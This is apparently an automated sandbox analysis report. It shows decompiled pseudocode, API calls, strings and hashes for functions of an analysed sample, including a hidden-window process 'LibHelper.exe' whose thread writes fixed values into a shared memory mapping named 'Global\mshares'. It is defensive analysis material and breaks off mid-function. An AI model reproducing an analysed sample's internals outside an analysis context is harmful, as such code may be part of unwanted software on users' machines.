Opcode ID: 9675b01d8c240ef419997f5374358c23c0379a001e5d096cd6b8dbbe909f8baf
Instruction ID: 85a4d0320fb3fb85648bb113d24f36b65c90c124e936cc5917b00f9a2c42888e
Opcode Fuzzy Hash: 9675b01d8c240ef419997f5374358c23c0379a001e5d096cd6b8dbbe909f8baf
Instruction Fuzzy Hash: 84112730B046456BEB159B39DC41BAA3B89FFC4B14F088069F805DA2D2EB64DD41D3E1

Uniqueness

Uniqueness Score: -1.00%

Function 0083CDCF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0083CDCF(void* __ebx, void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v1028;
				void* _t9;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				void* _t24;
				intOrPtr* _t27;

				_t19 = __ecx;
				_t9 = E0083CE49(__ebx, __ecx, __eflags, _a4, L"SIZE",  &_v1028, 0x200);
				if(_t9 == 0) {
					return _t9;
				}
				_push(0x2a);
				_push( &_v1028);
				_t24 = E00850BB8(_t19);
				if(_t24 == 0) {
					_t12 = 0;
					__eflags = 0;
				} else {
					_push( &_v1028);
					_t14 = E00841424();
					_t27 = _a8;
					 *_t27 = _t14;
					_t6 = _t24 + 2; // 0x2
					_t16 = E00841424();
					 *_a12 = _t16;
					if( *_t27 != 0x64 || _t16 != 0x64) {
						_t12 = 1;
					} else {
						_t12 = 0;
					}
				}
				return _t12;
			}

0x0083cdcf
0x0083cdec
0x0083cdf3
0x0083ce46
0x0083ce46
0x0083cdfc
0x0083cdfe
0x0083ce04
0x0083ce0a
0x0083ce40
0x0083ce40
0x0083ce0c
0x0083ce13
0x0083ce14
0x0083ce19
0x0083ce1c
0x0083ce1e
0x0083ce22
0x0083ce2a
0x0083ce30
0x0083ce3d
0x0083ce37
0x0083ce37
0x0083ce37
0x0083ce30
0x00000000

APIs

Part of subcall function 0083CE49: _swprintf.LIBCMT ref: 0083CE69

_wcschr.LIBVCRUNTIME ref: 0083CDFF

Strings

SIZE, xrefs: 0083CDE4
0Z, xrefs: 0083CDCF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf_wcschr
String ID: 0Z$SIZE
API String ID: 577678113-4168964419
Opcode ID: 86a044295046cbe97eeb09185dc9e3967d420855760e34305c825593dd361116
Instruction ID: 044e994dd820ba1fa976494c3893b5c79d00ccadd0860756addabf19b4a09caf
Opcode Fuzzy Hash: 86a044295046cbe97eeb09185dc9e3967d420855760e34305c825593dd361116
Instruction Fuzzy Hash: 850186B650030D6BCF31EA68DC06EEA73ACFB95314F1404A9EA52F7241EA30E985C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 0085A82C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0085A82C(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _t15;
				intOrPtr _t20;
				void* _t24;
				signed int _t25;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t36;

				_t28 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				E0084E2F0(__edx, 0x86a9f0, 0xc);
				_t30 = 0;
				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
				_t29 = E00858571(__ebx, _t24, __edx);
				_t25 =  *0x86dda0; // 0xfffffffe
				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
					L5:
					_t15 = E0085998C(5);
					 *((intOrPtr*)(_t31 - 4)) = _t30;
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
					_t36 = _t30 -  *0x86dd40; // 0x5b22e8
					if(_t36 != 0) {
						if(_t30 != 0) {
							asm("lock xadd [esi], eax");
							if((_t15 | 0xffffffff) == 0 && _t30 != 0x86db20) {
								E00857AC6(_t30);
							}
						}
						_t20 =  *0x86dd40; // 0x5b22e8
						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
						_t30 =  *0x86dd40; // 0x5b22e8
						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
						asm("lock inc dword [esi]");
					}
					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
					E0085A8BD();
					goto L3;
				} else {
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					L3:
					if(_t30 != 0) {
						return E0084E336(_t28);
					}
					E00857B4E(_t23, _t28, _t29, _t30);
					goto L5;
				}
			}

0x0085a82c
0x0085a82c
0x0085a82c
0x0085a833
0x0085a838
0x0085a83a
0x0085a842
0x0085a844
0x0085a850
0x0085a863
0x0085a865
0x0085a86b
0x0085a86e
0x0085a871
0x0085a874
0x0085a87a
0x0085a87e
0x0085a883
0x0085a887
0x0085a892
0x0085a897
0x0085a887
0x0085a898
0x0085a89d
0x0085a8a0
0x0085a8a6
0x0085a8a9
0x0085a8a9
0x0085a8ac
0x0085a8b3
0x00000000
0x0085a857
0x0085a857
0x0085a85a
0x0085a85c
0x0085a8cd
0x0085a8cd
0x0085a85e
0x00000000
0x0085a85e

APIs

Part of subcall function 00858571: GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
Part of subcall function 00858571: _free.LIBCMT ref: 008585A8
Part of subcall function 00858571: SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
Part of subcall function 00858571: _abort.LIBCMT ref: 008585EF

_abort.LIBCMT ref: 0085A85E
_free.LIBCMT ref: 0085A892

Strings

"[, xrefs: 0085A898, 0085A8A0

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_abort_free
String ID: "[
API String ID: 289325740-3208272576
Opcode ID: 327a034f19cad51916ac2ccbf245e83e46472bb196a882c807589d4626833ca1
Instruction ID: 958f039090b9bd630c22c51094d44f3f389fd870ec55dc842716bfbd36589e1a
Opcode Fuzzy Hash: 327a034f19cad51916ac2ccbf245e83e46472bb196a882c807589d4626833ca1
Instruction Fuzzy Hash: 18018031D01735AFC72AAF5D988162DB760FB44B22B16432AEC24E7681C77469468FC3

Uniqueness

Uniqueness Score: -1.00%

Function 008404D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E008404D4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00836DE3(E00836DE8(_t6, 0x8700e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x8700e0, 0x8700e0, 2);
				}
				return _t2;
			}

0x008404d4
0x008404da
0x008404e3
0x008404ec
0x00000000
0x0084050b
0x0084050c

APIs

WaitForSingleObject.KERNEL32(?,000000FF,008405F3,?,?,00840668,?,?,?,?,?,00840652), ref: 008404DA
GetLastError.KERNEL32(?,?,00840668,?,?,?,?,?,00840652), ref: 008404E6

Part of subcall function 00836DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836E06

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008404EF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 87164338271b7aa0fa0e0ce9190ec10f37ca330fbd5f6ada41df018c6be97001
Instruction ID: 7d23d36af82340926f36c12ad87f4a666b408f1c1a8c534d82003fc04fc9c2c0
Opcode Fuzzy Hash: 87164338271b7aa0fa0e0ce9190ec10f37ca330fbd5f6ada41df018c6be97001
Instruction Fuzzy Hash: CED02E31A0AC2073CA00332C6C0AEAF3925FF42330F228348F238E42F5DA6049908AD3

Uniqueness

Uniqueness Score: -1.00%

Function 0083D70A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0083D70A(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0083d70d
0x0083d71d
0x0083d725
0x0083d727
0x00000000
0x0083d727
0x0083d72c

APIs

GetModuleHandleW.KERNEL32(00000000,?,0083D007,?), ref: 0083D70F
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0083D007,?), ref: 0083D71D

Strings

RTL, xrefs: 0083D717

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 8bfc5cde6908912c4590565ed91ce5b9b1c4d096caa55fe7755bf2d9390eed0e
Instruction ID: ea317494d782435fbaf9258f482baca9c6c74cfdc4916a9231c13e0096d9cfd4
Opcode Fuzzy Hash: 8bfc5cde6908912c4590565ed91ce5b9b1c4d096caa55fe7755bf2d9390eed0e
Instruction Fuzzy Hash: BBC01231245F5166DF3027207C0DF432D88BB01B51F061488F243DD1D0D5E9C441C791

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: LibHelper.exe PID: 6076 Parent PID: 6004 LibHelper.exeCOMMON

Executed Functions

Function 010710A0, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 130
windowregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010710A0(void* __ebx, struct HINSTANCE__* _a4) {
				signed int _v8;
				struct _WNDCLASSEXW _v56;
				void* _v76;
				struct tagMSG _v84;
				struct HACCEL__* _v88;
				void* __edi;
				void* __esi;
				signed int _t28;
				struct HICON__* _t32;
				struct HICON__* _t34;
				struct HWND__* _t37;
				struct HACCEL__* _t40;
				void* _t62;
				struct HINSTANCE__* _t63;
				struct HWND__* _t66;
				void* _t67;
				signed int _t68;

				_t28 =  *0x108300c; // 0x98fa3f37
				_v8 = _t28 ^ _t68;
				_t63 = _a4;
				LoadStringW(_t63, 0x67, "PcHelper", 0x64); // executed
				LoadStringW(_t63, 0x6d, "PCHELPER", 0x64);
				_v56.cbSize = 0x30;
				_v56.style = 3;
				_v56.lpfnWndProc = E01071230;
				_v56.cbClsExtra = 0;
				_v56.cbWndExtra = 0;
				_v56.hInstance = _t63;
				_t32 = LoadIconW(_t63, 0x6b); // executed
				_v56.hIcon = _t32;
				_v56.hCursor = LoadCursorW(0, 0x7f00);
				_v56.hbrBackground = 6;
				_v56.lpszMenuName = 0x6d;
				_v56.lpszClassName = 0x1084420;
				_t34 = LoadIconW(_v56.hInstance, 0x6c); // executed
				_v56.hIconSm = _t34;
				RegisterClassExW( &_v56);
				 *0x10845b0 = _t63; // executed
				_t37 = CreateWindowExW(0, "PCHELPER", "PcHelper", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, _t63, 0); // executed
				_t66 = _t37;
				if(_t66 != 0) {
					ShowWindow(_t66, 0); // executed
					UpdateWindow(_t66);
					_t40 = LoadAcceleratorsW(_t63, 0x6d); // executed
					_v88 = _t40;
					CreateThread(0, 0, E01071020, 0, 0, 0); // executed
					_t67 = GetMessageW;
					if(GetMessageW( &_v84, 0, 0, 0) != 0) {
						_t63 = TranslateMessage;
						do {
							if(TranslateAcceleratorW(_v84, _v88,  &_v84) == 0) {
								TranslateMessage( &_v84);
								DispatchMessageW( &_v84);
							}
						} while (GetMessageW( &_v84, 0, 0, 0) != 0);
					}
					return E01071463(_v8 ^ _t68, _t62, _t63, _t67);
				} else {
					return E01071463(_v8 ^ _t68, _t62, _t63, _t66);
				}
			}

0x010710a6
0x010710ad
0x010710b8
0x010710c5
0x010710d1
0x010710dc
0x010710e3
0x010710ea
0x010710f1
0x010710f8
0x010710ff
0x01071102
0x0107110b
0x01071119
0x0107111c
0x01071123
0x0107112a
0x01071131
0x01071133
0x0107113a
0x01071166
0x0107116c
0x01071172
0x01071176
0x0107118d
0x01071194
0x0107119d
0x010711b2
0x010711b5
0x010711bb
0x010711cf
0x010711d1
0x010711e0
0x010711f2
0x010711f8
0x010711fe
0x010711fe
0x0107120c
0x01071210
0x01071223
0x0107117a
0x01071187
0x01071187

APIs

LoadStringW.USER32(?,00000067,PcHelper,00000064), ref: 010710C5
LoadStringW.USER32(?,0000006D,PCHELPER,00000064), ref: 010710D1
LoadIconW.USER32(?,0000006B), ref: 01071102
LoadCursorW.USER32(00000000,00007F00), ref: 0107110E
LoadIconW.USER32(?,0000006C), ref: 01071131
RegisterClassExW.USER32 ref: 0107113A
CreateWindowExW.USER32 ref: 0107116C
ShowWindow.USER32(00000000,00000000), ref: 0107118D
UpdateWindow.USER32(00000000), ref: 01071194
LoadAcceleratorsW.USER32 ref: 0107119D
CreateThread.KERNELBASE ref: 010711B5
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010711CB
TranslateAcceleratorW.USER32(?,?,?), ref: 010711EA
TranslateMessage.USER32(?), ref: 010711F8
DispatchMessageW.USER32 ref: 010711FE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0107120A

Strings

PCHELPER, xrefs: 010710C9, 0107112A, 0107115F
0, xrefs: 010710DC
m, xrefs: 01071123
PcHelper, xrefs: 010710BD, 0107115A
@Cw, xrefs: 0107110E

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Message$Window$CreateIconStringTranslate$AcceleratorAcceleratorsClassCursorDispatchRegisterShowThreadUpdate
String ID: 0$PCHELPER$PcHelper$m$@Cw
API String ID: 3299975972-1813121543
Opcode ID: e56bc0e6c8b9d029cd2df88e92977491c26df8baf4c20482da4d9ea82b656fbb
Instruction ID: 3fcfdf95af34a218d2b1d8a55adc1f09d354f1ec7775490727295d0d9900593f
Opcode Fuzzy Hash: e56bc0e6c8b9d029cd2df88e92977491c26df8baf4c20482da4d9ea82b656fbb
Instruction Fuzzy Hash: B2411371E40318BBDB219BD5EC45FAE7BB8AF48B11F100019F641BB1C4DBBA6515CB98

Uniqueness

Uniqueness Score: -1.00%

Function 01071C8F, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01071C8F() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E01071C9B); // executed
				return _t1;
			}

0x01071c94
0x01071c9a

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001C9B,01071842), ref: 01071C94

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 39c59a7231928cc5c031f8156b748873bf3db3e3381386536720ce87d6e09f98
Instruction ID: 11ef369349c90dcf09c512e6027b7bfb4a96d71c611c0b61671597c533466804
Opcode Fuzzy Hash: 39c59a7231928cc5c031f8156b748873bf3db3e3381386536720ce87d6e09f98
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0107149B, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0107149B(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x10838d4, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x10838d0 = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x10838ec = _t11;
						 *0x10838f0 = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E01071AF9(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x10838d4);
						_t7 =  *0x10838d0; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x0107149b
0x0107149c
0x010714a7
0x010714b2
0x010714b8
0x010714bc
0x010714cf
0x010714e1
0x010714e3
0x010714eb
0x01071506
0x0107150c
0x01071513
0x00000000
0x00000000
0x00000000
0x00000000
0x010714f1
0x010714f1
0x010714f7
0x010714fc
0x010714fe
0x010714fe
0x010714be
0x010714c9
0x010714cd
0x01071515
0x01071517
0x0107151c
0x01071522
0x01071528
0x0107152f
0x00000000
0x01071532
0x01071538
0x00000000
0x00000000
0x00000000
0x010714cd

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(010838D4,00000FA0,?,?,01071479), ref: 010714A7
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01071479), ref: 010714B2
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01071479), ref: 010714C3
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 010714D5
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 010714E3
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01071479), ref: 01071506
___scrt_fastfail.LIBCMT ref: 01071517
DeleteCriticalSection.KERNEL32(010838D4,00000007,?,?,01071479), ref: 01071522
CloseHandle.KERNEL32(00000000,?,?,01071479), ref: 01071532

Strings

kernel32.dll, xrefs: 010714BE
api-ms-win-core-synch-l1-2-0.dll, xrefs: 010714AD
SleepConditionVariableCS, xrefs: 010714CF
WakeAllConditionVariable, xrefs: 010714DB

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 713e00bd7229ec6e6a5665fc4b43facb8352b6ba7f8ebaa6e54365dbc2eeadff
Instruction ID: 8a9dee5104325aa10e60f812032d44ca430debfb4d48aef2698f20b56241541d
Opcode Fuzzy Hash: 713e00bd7229ec6e6a5665fc4b43facb8352b6ba7f8ebaa6e54365dbc2eeadff
Instruction Fuzzy Hash: 23015271E54311EBDB322AB96C0DB1A3AE8BF80A917044154B9C5EB288DE79C40397A8

Uniqueness

Uniqueness Score: -1.00%

Function 01071230, Relevance: 10.6, APIs: 7, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E01071230(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				signed int _v8;
				signed int _v12;
				struct tagPAINTSTRUCT _v76;
				void* __esi;
				signed int _t16;
				void* _t19;
				void* _t22;
				void* _t31;
				int _t43;
				int _t48;
				void* _t57;
				void* _t58;
				struct HWND__* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				signed int _t67;

				_t69 = (_t67 & 0xfffffff8) - 0x4c;
				_t16 =  *0x108300c; // 0x98fa3f37
				_v8 = _t16 ^ (_t67 & 0xfffffff8) - 0x0000004c;
				_t43 = _a8;
				_t60 = _a4;
				_t19 = _t43 - 2;
				if(_t19 == 0) {
					PostQuitMessage(0);
					_pop(_t61);
					return E01071463(_v8 ^ _t69, _t57, _t58, _t61);
				} else {
					_t22 = _t19 - 0xd;
					if(_t22 == 0) {
						BeginPaint(_t60,  &_v76);
						EndPaint(_t60,  &_v76);
						_pop(_t62);
						return E01071463(_v8 ^ _t69, _t57, _t58, _t62);
					} else {
						if(_t22 == 0x102) {
							_t48 = _a12;
							_t31 = (_t48 & 0x0000ffff) - 0x68;
							if(_t31 == 0) {
								DialogBoxParamW( *0x10845b0, 0x67, _t60, E01071350, 0);
								_pop(_t63);
								return E01071463(_v12 ^ _t69, _t57, _t58, _t63);
							} else {
								if(_t31 == 1) {
									DestroyWindow(_t60);
									_pop(_t64);
									return E01071463(_v8 ^ _t69, _t57, _t58, _t64);
								} else {
									DefWindowProcW(_t60, 0x111, _t48, _a16);
									_pop(_t65);
									return E01071463(_v8 ^ _t69, _t57, _t58, _t65);
								}
							}
						} else {
							DefWindowProcW(_t60, _t43, _a12, _a16); // executed
							_pop(_t66);
							return E01071463(_v8 ^ _t69, _t57, _t58, _t66);
						}
					}
				}
			}

0x01071236
0x01071239
0x01071240
0x01071244
0x0107124a
0x0107124d
0x01071250
0x0107132b
0x01071337
0x01071342
0x01071256
0x01071256
0x01071259
0x01071303
0x0107130f
0x01071317
0x01071326
0x0107125f
0x01071264
0x01071286
0x0107128c
0x0107128f
0x010712e3
0x010712eb
0x010712fa
0x01071291
0x01071294
0x010712b9
0x010712c1
0x010712d0
0x01071296
0x010712a0
0x010712a6
0x010712b5
0x010712b5
0x01071294
0x01071266
0x0107126e
0x01071274
0x01071283
0x01071283
0x01071264
0x01071259

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0107126E
DefWindowProcW.USER32(?,00000111,?,?), ref: 010712A0
BeginPaint.USER32(?,?), ref: 01071303
EndPaint.USER32(?,?), ref: 0107130F
PostQuitMessage.USER32(00000000), ref: 0107132B

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: PaintProcWindow$BeginMessagePostQuit
String ID:
API String ID: 3181456275-0
Opcode ID: 541541717854aaf85f9c0222e37fd8e03f876c361c5951b2cb6a6861f6862c05
Instruction ID: 73bb1e2e99fe70358d5b49ece78373d18580415b029a08a3705c637721279af9
Opcode Fuzzy Hash: 541541717854aaf85f9c0222e37fd8e03f876c361c5951b2cb6a6861f6862c05
Instruction Fuzzy Hash: CE219871A181096BD714EF78F846AAB7BE8EF4A210F40050AF9C6D61D0DA769420C7D6

Uniqueness

Uniqueness Score: -1.00%

Function 01071020, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01071020() {
				void* _t2;
				void* _t4;
				void* _t8;
				void* _t9;

				_t9 = 0;
				while(1) {
					L1:
					Sleep(0x2710); // executed
					_t2 = OpenFileMappingA(0xf001f, 0, "Global\\mshares"); // executed
					_t8 = _t2;
					if(_t8 == 0) {
						break;
					}
					_t9 = _t9 + 1; // executed
					_t4 = MapViewOfFile(_t8, 6, 0, 0, 0x400); // executed
					if(_t4 != 0) {
						 *_t4 = 0x3201f49;
						 *((intOrPtr*)(_t4 + 4)) = 0x18c1df99;
						UnmapViewOfFile(_t4);
						FindCloseChangeNotification(_t8); // executed
						continue;
					}
					L6:
					return 0;
				}
				if(_t9 == 0) {
					goto L1;
				} else {
					_t9 = _t9 + 1;
					if(_t9 < 0xa) {
						goto L1;
					}
				}
				goto L6;
			}

0x01071029
0x01071030
0x01071030
0x01071035
0x01071043
0x01071049
0x0107104d
0x00000000
0x00000000
0x0107105b
0x0107105c
0x01071064
0x01071067
0x0107106d
0x01071074
0x0107107b
0x00000000
0x0107107b
0x0107108f
0x01071092
0x01071092
0x01071085
0x00000000
0x01071087
0x01071087
0x0107108b
0x00000000
0x00000000
0x0107108b
0x00000000

APIs

Sleep.KERNELBASE(00002710), ref: 01071035
OpenFileMappingA.KERNEL32 ref: 01071043
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000400), ref: 0107105C
UnmapViewOfFile.KERNEL32(00000000), ref: 01071074
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0107107B

Strings

Global\mshares, xrefs: 01071037

Memory Dump Source

Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true

Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File

Similarity

API ID: File$View$ChangeCloseFindMappingNotificationOpenSleepUnmap
String ID: Global\mshares
API String ID: 425970157-2130681182
Opcode ID: 133c7d5e34b612b18917467937c7d79e376f359efb4cd337267b1c8ed94f87aa
Instruction ID: eb02ca631a9a56f19228667381f2cc85e26715e82ba4e641154580c187b82032
Opcode Fuzzy Hash: 133c7d5e34b612b18917467937c7d79e376f359efb4cd337267b1c8ed94f87aa
Instruction Fuzzy Hash: 86F0F631B40210AFE3326B945C09F2A7AA8BF44B80F111018F7C5BA0C5C6B1C40243E9

Uniqueness

Uniqueness Score: -1.00%

Function 01077299, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E01077299(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E010754A9(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E010766F9(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
